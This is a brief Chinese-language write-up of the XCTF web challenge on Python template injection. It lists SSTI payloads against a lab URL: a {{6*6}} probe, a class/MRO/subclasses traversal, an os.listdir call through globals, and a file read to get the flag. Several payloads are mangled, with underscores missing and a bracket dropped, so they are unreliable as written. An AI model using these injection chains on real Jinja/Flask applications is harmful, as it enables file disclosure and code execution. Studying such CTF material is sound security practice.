XCTF--WEB Web_python_template_injection

Web_python_template_injection

构建playload:http://111.198.29.45:53688/%7B%7B6*6%7D%7D
页面返回了36
构建继承?playload:http://111.198.29.45:53688/{{’’.class.mro[2].subclasses()}}
XCTF--WEB Web_python_template_injection_第1张图片
查找flagplayload:http://111.198.29.45:53688{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}
在这里插入图片描述
拿到flag:http://111.198.29.45:53688/{{’’.class.mro[2].subclasses()40.read()}}
在这里插入图片描述

你可能感兴趣的:(CTF)